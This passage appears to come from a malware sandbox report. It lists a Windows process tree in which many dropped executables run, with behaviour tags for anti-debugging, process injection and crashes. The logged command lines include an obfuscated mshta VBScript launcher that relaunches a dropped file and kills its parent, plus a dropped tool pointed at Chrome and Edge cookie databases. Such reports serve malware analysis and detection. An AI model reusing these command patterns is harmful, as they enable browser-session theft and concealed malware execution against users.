PID:688

C:\Users\Admin\Documents\iL0yuFcDXwk212Jhut9SI_D7.exe
"C:\Users\Admin\Documents\iL0yuFcDXwk212Jhut9SI_D7.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6888

C:\Users\Admin\Documents\o9ec8i3AuTv895w9Wwh2Xg7O.exe
"C:\Users\Admin\Documents\o9ec8i3AuTv895w9Wwh2Xg7O.exe"
6⤵
- Suspicious use of SetThreadContext
PID:6892

C:\Users\Admin\Documents\o9ec8i3AuTv895w9Wwh2Xg7O.exe
"C:\Users\Admin\Documents\o9ec8i3AuTv895w9Wwh2Xg7O.exe"
7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6224

C:\Users\Admin\Documents\t7q7k6tJCnKfUzC0JhUMWzyH.exe
"C:\Users\Admin\Documents\t7q7k6tJCnKfUzC0JhUMWzyH.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7012

C:\Users\Admin\Documents\U_hgErrmgZhVpF2OiGJlEYzh.exe
"C:\Users\Admin\Documents\U_hgErrmgZhVpF2OiGJlEYzh.exe"
6⤵
PID:6936

C:\Users\Admin\Documents\w3QFKRFgRfpWBXFm6cSDLtOY.exe
"C:\Users\Admin\Documents\w3QFKRFgRfpWBXFm6cSDLtOY.exe"
6⤵
PID:6928

C:\Users\Admin\Documents\Pdws_DJ0MBlTx5lfGYlWJz73.exe
"C:\Users\Admin\Documents\Pdws_DJ0MBlTx5lfGYlWJz73.exe"
6⤵
PID:6920

C:\Users\Admin\AppData\Roaming\5608748.exe
"C:\Users\Admin\AppData\Roaming\5608748.exe"
7⤵
PID:8140

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8140 -s 2380
8⤵
- Program crash
PID:6160

C:\Users\Admin\AppData\Roaming\2381381.exe
"C:\Users\Admin\AppData\Roaming\2381381.exe"
7⤵
- Suspicious behavior: SetClipboardViewer
PID:1188

C:\Users\Admin\AppData\Roaming\6507952.exe
"C:\Users\Admin\AppData\Roaming\6507952.exe"
7⤵
PID:5636

C:\Users\Admin\AppData\Roaming\5757479.exe
"C:\Users\Admin\AppData\Roaming\5757479.exe"
7⤵
PID:7196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7196 -s 2452
8⤵
- Program crash
PID:3724

C:\Users\Admin\Documents\Ko33QUVAALpOh1b1A7sT3KaE.exe
"C:\Users\Admin\Documents\Ko33QUVAALpOh1b1A7sT3KaE.exe"
6⤵
PID:6880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 316
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7852

C:\Users\Admin\Documents\pIoPTaVopbMnjFMwNtxp7QMR.exe
"C:\Users\Admin\Documents\pIoPTaVopbMnjFMwNtxp7QMR.exe"
6⤵
PID:6796

C:\Users\Admin\Documents\NFLS5w5GU90zSCvdUyD0yPMK.exe
"C:\Users\Admin\Documents\NFLS5w5GU90zSCvdUyD0yPMK.exe"
6⤵
PID:6404

C:\Users\Admin\Documents\ExHMKB1suxEclJITKzN91asY.exe
"C:\Users\Admin\Documents\ExHMKB1suxEclJITKzN91asY.exe"
6⤵
PID:6560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6560 -s 272
7⤵
- Program crash
PID:7284

C:\Users\Admin\Documents\p7LGT3M3Am9YUZgpHGNzqVFz.exe
"C:\Users\Admin\Documents\p7LGT3M3Am9YUZgpHGNzqVFz.exe"
6⤵
PID:6432

C:\Users\Admin\Documents\XjldV96ttY2QjDgOTTvBY1au.exe
"C:\Users\Admin\Documents\XjldV96ttY2QjDgOTTvBY1au.exe"
6⤵
PID:7096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 252
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5832

C:\Users\Admin\Documents\CmKRp6AHW2bQAlX3wZm70Mm9.exe
"C:\Users\Admin\Documents\CmKRp6AHW2bQAlX3wZm70Mm9.exe"
6⤵
PID:5464

C:\Users\Admin\Documents\EnUah771OdJtP44Bw1RSEYBc.exe
"C:\Users\Admin\Documents\EnUah771OdJtP44Bw1RSEYBc.exe"
6⤵
PID:7160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 252
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8032

C:\Users\Admin\Documents\DxRHLdhJwj2u6sxzhWkmB7cv.exe
"C:\Users\Admin\Documents\DxRHLdhJwj2u6sxzhWkmB7cv.exe"
6⤵
PID:7872

C:\Users\Admin\AppData\Local\Temp\is-DNR5U.tmp\DxRHLdhJwj2u6sxzhWkmB7cv.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DNR5U.tmp\DxRHLdhJwj2u6sxzhWkmB7cv.tmp" /SL5="$20540,138429,56832,C:\Users\Admin\Documents\DxRHLdhJwj2u6sxzhWkmB7cv.exe"
7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:8168

C:\Users\Admin\AppData\Local\Temp\is-0LL38.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-0LL38.tmp\Setup.exe" /Verysilent
8⤵
PID:7212

C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
9⤵
PID:7228

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407960 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
10⤵
PID:5928

C:\Users\Admin\Documents\EUkgfe621oxW1Cxq9DPTgOif.exe
"C:\Users\Admin\Documents\EUkgfe621oxW1Cxq9DPTgOif.exe"
6⤵
PID:7712

C:\Users\Admin\Documents\EUkgfe621oxW1Cxq9DPTgOif.exe
C:\Users\Admin\Documents\EUkgfe621oxW1Cxq9DPTgOif.exe
7⤵
PID:4360

C:\Users\Admin\Documents\3i32jFwvGUsnagmBNZ6q5sdi.exe
"C:\Users\Admin\Documents\3i32jFwvGUsnagmBNZ6q5sdi.exe"
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 280
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5368

C:\Users\Admin\Documents\39eg8UuwBuXf7dc_SyYWwMxD.exe
"C:\Users\Admin\Documents\39eg8UuwBuXf7dc_SyYWwMxD.exe"
2⤵
- Executes dropped EXE
PID:5084

C:\Users\Admin\Documents\rQI6pu_9npeQN6pi69yyeMWJ.exe
"C:\Users\Admin\Documents\rQI6pu_9npeQN6pi69yyeMWJ.exe"
2⤵
PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 280
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5440

C:\Users\Admin\Documents\eshLa6UbkkoXovQ5C5WvNZGt.exe
"C:\Users\Admin\Documents\eshLa6UbkkoXovQ5C5WvNZGt.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4704

C:\Users\Admin\Documents\1OvDeWKnCPXZ535E4M61Hyvu.exe
"C:\Users\Admin\Documents\1OvDeWKnCPXZ535E4M61Hyvu.exe"
2⤵
- Executes dropped EXE
PID:2836

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\1OvDeWKnCPXZ535E4M61Hyvu.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\1OvDeWKnCPXZ535E4M61Hyvu.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
3⤵
PID:4756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\1OvDeWKnCPXZ535E4M61Hyvu.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\1OvDeWKnCPXZ535E4M61Hyvu.exe" ) do taskkill -f -iM "%~NxA"
4⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
5⤵
- Executes dropped EXE
PID:2896

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
6⤵
PID:5348

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
7⤵
PID:5756

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2096

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "1OvDeWKnCPXZ535E4M61Hyvu.exe"
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Users\Admin\Documents\czcywb1fZDEdgFzt1mPKkXQl.exe
"C:\Users\Admin\Documents\czcywb1fZDEdgFzt1mPKkXQl.exe"
2⤵
PID:2096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 240
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5256

C:\Users\Admin\Documents\DwtRtrKcrNNzwRu4T2lxgQFY.exe
"C:\Users\Admin\Documents\DwtRtrKcrNNzwRu4T2lxgQFY.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4832

C:\Users\Admin\Documents\DwtRtrKcrNNzwRu4T2lxgQFY.exe
C:\Users\Admin\Documents\DwtRtrKcrNNzwRu4T2lxgQFY.exe
3⤵
- Executes dropped EXE
PID:3164

C:\Users\Admin\Documents\NrZsYboOALPPtV9yFLrG31O6.exe
"C:\Users\Admin\Documents\NrZsYboOALPPtV9yFLrG31O6.exe"
2⤵
- Executes dropped EXE
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 296
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5504

C:\Users\Admin\Documents\4ec0EfJ26Oi9LMXwE6FcxxsD.exe
"C:\Users\Admin\Documents\4ec0EfJ26Oi9LMXwE6FcxxsD.exe"
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 320
3⤵
- Program crash
PID:3544

C:\Users\Admin\Documents\Dz3uQK1CslN0GEUk3d36pfch.exe
"C:\Users\Admin\Documents\Dz3uQK1CslN0GEUk3d36pfch.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2228

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
- Executes dropped EXE
PID:1412

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1208

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:5724

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1736

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7768

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
- Executes dropped EXE
PID:3272

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
- Executes dropped EXE
PID:4728

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:5948

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1124

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:6440

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7372

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1228

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7324

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:6560

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:3692

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7904

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7892

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1068

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:8016

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2232

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4944

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5956

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1312

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:3824

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5772

C:\Users\Admin\Documents\XSXAonP7RSV0ep9KE9Bx9GGY.exe
"C:\Users\Admin\Documents\XSXAonP7RSV0ep9KE9Bx9GGY.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:940

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv juDKImBLWkCHi9D6+osR0w.0.2
1⤵
- Modifies data under HKEY_USERS
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3208 -ip 3208
1⤵
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4480 -ip 4480
1⤵
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3544 -ip 3544
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2704 -ip 2704
1⤵
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3084 -ip 3084
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:5100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:1284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4276 -ip 4276
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2096 -ip 2096
1⤵
PID:1148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4036 -ip 4036
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 4564 -ip 4564
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 912 -ip 912
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4340

C:\Users\Admin\AppData\Local\Temp\E81F.exe
C:\Users\Admin\AppData\Local\Temp\E81F.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5620 -ip 5620
1⤵
PID:4584

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 4116 -ip 4116
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5416

C:\Users\Admin\AppData\Local\Temp\EE98.exe
C:\Users\Admin\AppData\Local\Temp\EE98.exe
1⤵
- Executes dropped EXE
PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 256
2⤵
- Program crash
PID:7196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5952 -ip 5952
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5004

C:\Users\Admin\AppData\Local\Temp\156A.exe
C:\Users\Admin\AppData\Local\Temp\156A.exe
1⤵
PID:6548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 3684 -ip 3684
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 1592 -ip 1592
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 6880 -ip 6880
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 6720 -ip 6720
1⤵
PID:8140

C:\Users\Admin\AppData\Local\Temp\562D.exe
C:\Users\Admin\AppData\Local\Temp\562D.exe
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6148

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
PID:4644

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E7C19FFEA6FB6CC84813B5F13F8DAACD C
2⤵
- Loads dropped DLL
PID:6768

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 0C47094A7D69F66BE66F6C638B120CB9 C
2⤵
PID:5780

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6A5689BAE7481F65BA1E9CD83460683D
2⤵
PID:6380

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 47495B267E291BCD5E20C68824EE2853 C
2⤵
PID:5340

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding AEB9723208EC9F4E83B404543E1DE40A C
2⤵
PID:3304

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
2⤵
PID:6860

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
3⤵
PID:5280

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
4⤵
PID:8060

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff9c7e8dec0,0x7ff9c7e8ded0,0x7ff9c7e8dee0
5⤵
PID:5232

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1b8,0x1bc,0x1c0,0x194,0x1c4,0x7ff72a129e70,0x7ff72a129e80,0x7ff72a129e90
6⤵
PID:7388

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --mojo-platform-channel-handle=2232 /prefetch:8
5⤵
PID:7584

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
